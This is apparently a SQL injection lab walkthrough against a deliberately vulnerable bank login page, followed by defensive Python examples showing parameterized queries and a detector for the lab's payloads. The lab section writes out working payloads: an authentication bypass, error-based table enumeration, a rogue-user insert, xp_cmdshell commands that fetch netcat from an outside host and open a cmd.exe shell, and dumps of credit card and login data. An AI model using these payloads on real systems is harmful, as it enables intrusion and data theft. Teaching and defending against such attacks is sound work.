Juggy Bank SQL Injection Lab
First of all, let's work out what database the system is running.
On your 2003 Server, open your web browser and go to http://localhost/client2.htm. You should see an entry showing the Juggy Bank web page.
In the Login Name box, type a single quote ' and press return.
This should return an error page showing the database type and the ASP script that ran:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''
/login.asp, line 5
As can be seen, the back-end database is MS SQL Server, and the application does not handle database errors by redirecting to a generic "oops" page, so the raw error text reaches the browser.
Now let's try blind SQL injection into the Login Name box. This should bypass the authentication system.
In the Login box type:
luke' or 1=1 --
This makes the SQL statement passed to the database the following:
select * from userinfo where username='luke' or 1=1 --' and password=''
Anything after the -- is ignored as a comment, so the password check is never evaluated and or 1=1 makes the WHERE clause true for every row.
This should log you in to the web page as the first user in the database.
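An added example, not code from the lab: a Python stand-in for the query construction in login.asp (the ASP source is not on the page, so the string concatenation is assumed), run against an in-memory SQLite userinfo table with constructed rows. It shows the lab's bypass string succeeding against the concatenated query, failing against a parameterized one, and the raw error text that a lone quote produces.

```python
import sqlite3

# Constructed stand-in for the lab's userinfo table. The lab runs MS SQL
# Server; SQLite is used here only so the example runs offline.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table userinfo (username varchar(20), password varchar(20))")
    db.executemany("insert into userinfo values (?, ?)",
                   [("luke", "s3cret"), ("leia", "alderaan")])
    return db

def login_vulnerable(db, username, password):
    """Builds the statement by concatenating user input into the SQL text.
    Assumption: this is how login.asp works; its source is not on the page.
    Returns (username_logged_in_or_None, error_text_or_None)."""
    sql = ("select * from userinfo where username='" + username +
           "' and password='" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as e:
        # Returning the raw driver error is what lets the lab read the schema
        return None, str(e)
    return (row[0] if row else None), None

def login_parameterized(db, username, password):
    """Same query with bound parameters: the driver passes the input as data,
    so quotes, 'or 1=1' and '--' are compared literally, never parsed as SQL."""
    sql = "select * from userinfo where username=? and password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    payload = "luke' or 1=1 --"                   # the lab's bypass string
    print(login_vulnerable(db, payload, ""))      # logs in without a password
    print(login_parameterized(db, payload, ""))   # None: no such user
    print(login_vulnerable(db, "'", ""))          # (None, <driver error text>)
```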
Now let's go back to the login screen and try enumerating the table. The first thing we need is the table name. Insert the following into the login box:
' having 1=1
This will cause the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause
/login.asp, line 5
Notice the information in the error message: it gives the table name, userinfo, and the first column name, username.
Now we need to know the next column in the table. Type the following in the Login box:
' group by userinfo.username having 1=1
This causes the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause
/login.asp, line 5
Now let's try once more with userinfo.password:
' group by userinfo.password having 1=1
This time the error names userinfo.username again rather than a new column, indicating that the userinfo table has only two columns:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause
/login.asp, line 5
We must now enumerate the column types. Type:
' union select sum(username) from userinfo
This gives the following error, indicating that the column type is varchar:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument
/login.asp, line 5
And the same for the password column:
' union select sum(password) from userinfo
This produces the same error, so password is also a varchar.
Now let's create a new user:
' ; insert into userinfo values('john','password')
Log in with the newly created user.
Further Investigation
Now let's get some information on other databases.
First, let's put a file on the web server:
'; exec master xp_cmdshell "echo I was here on %date% > c:\inetpub\wwwroot\Boo.txt"
To check that the file is on the server, open http://localhost/Boo.txt
To fetch a file from a TFTP server, e.g. netcat from the 172.16.0.11 server:
'; exec master xp_cmdshell 'tftp -i 172.16.0.11 get nc.exe c:\inetpub\wwwroot\nc.exe'
and then execute it, listening on port 9999:
';exec master xp_cmdshell 'c:\inetpub\wwwroot\nc.exe -L -d -e cmd.exe -p 9999'
You should now be able to telnet to localhost on port 9999.
Now let's dump the credit card details into a text file:
';exec master xp_cmdshell 'osql -E -Q "select * from juggybank creditcard" -o c:\inetpub\wwwroot\card_details.txt'
To fetch those details off the web server, browse to the page
http://localhost/card_details.txt
To dump the login details:
';exec master xp_cmdshell 'osql -E -Q "select * from juggybank userinfo" -o c:\inetpub\wwwroot\logins.txt'
To fetch those details off the web server, browse to the page
http://localhost/logins.txt
Similar commands can be run to mine data from sysdatabases and sysobjects:
';exec master xp_cmdshell 'osql -E -Q "select * from master sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt'
';exec master xp_cmdshell 'osql -E -Q "select * from juggybank sysobjects where xtype=''u'' " -o c:\inetpub\wwwroot\juggybanktables.txt'
In the above statement, xtype=''u'' is two consecutive single quotes on each side of the u, not a double quote: the inner quotes must be doubled because the whole osql query is already inside a single-quoted string.
To fetch those details off the web server, browse to the pages
http://localhost/masterdatabase.txt
and
http://localhost/juggybanktables.txt
Another way, with stored procedures
The above can also be achieved using a stored procedure:
'; exec sp_makewebtask "c:\inetpub\wwwroot\evil.html", "select * from userinfo";
Now request this page at http://localhost/evil.html
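An added example from the defender's side, not part of the lab: a small classifier that decodes a login form submission and flags the signatures used throughout this lab (the quote probe, or 1=1 with a -- comment, the having / group by column enumeration, union select, and stacked statements such as ; insert, xp_cmdshell and sp_makewebtask). The sample form bodies are constructed, as is the distinction between a low-severity lone quote (which legitimate names like O'Brien contain) and high-severity SQL syntax.

```python
import re
from urllib.parse import parse_qs

# Signatures drawn from the payloads used in this lab. A lone quote is only a
# probe (and appears in real names such as O'Brien), so it is rated low;
# everything else is SQL syntax that has no business in a login field.
RULES = [
    ("quote", r"'", "low"),
    ("comment", r"--", "high"),
    ("tautology", r"\bor\b\s+[\w']+\s*=\s*[\w']+", "high"),
    ("having", r"\bhaving\b", "high"),
    ("group_by", r"\bgroup\s+by\b", "high"),
    ("union_select", r"\bunion\s+select\b", "high"),
    ("stacked_statement", r";\s*(exec|insert|update|delete)\b", "high"),
    ("xp_cmdshell", r"\bxp_cmdshell\b", "high"),
    ("sp_makewebtask", r"\bsp_makewebtask\b", "high"),
]
SEVERITY = {"none": 0, "low": 1, "high": 2}

def classify_login(body):
    """Decode a URL-encoded login form body and return (field, rule, severity)
    for every signature found in any field, in rule order."""
    hits = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            text = value.lower()
            for rule, pattern, severity in RULES:
                if re.search(pattern, text):
                    hits.append((field, rule, severity))
    return hits

def max_severity(body):
    """Worst severity found in the body: 'none', 'low' or 'high'."""
    worst = "none"
    for _, _, severity in classify_login(body):
        if SEVERITY[severity] > SEVERITY[worst]:
            worst = severity
    return worst

# Constructed form submissions, as login.asp would receive them from the lab steps
SAMPLE_BODIES = [
    "username=luke&password=s3cret",                         # benign login
    "username=O%27Brien&password=pw",                        # legitimate apostrophe
    "username=luke%27+or+1%3D1+--&password=",                # authentication bypass
    "username=%27+group+by+userinfo.username+having+1%3D1&password=",
    "username=%27+union+select+sum(username)+from+userinfo&password=",
    "username=%27+%3B+insert+into+userinfo+values(%27john%27,%27password%27)&password=",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(max_severity(body), sorted({r for _, r, _ in classify_login(body)}), body)
```

Rate the low-severity quote hit as a signal to log rather than block, since it is the one pattern here that real input produces.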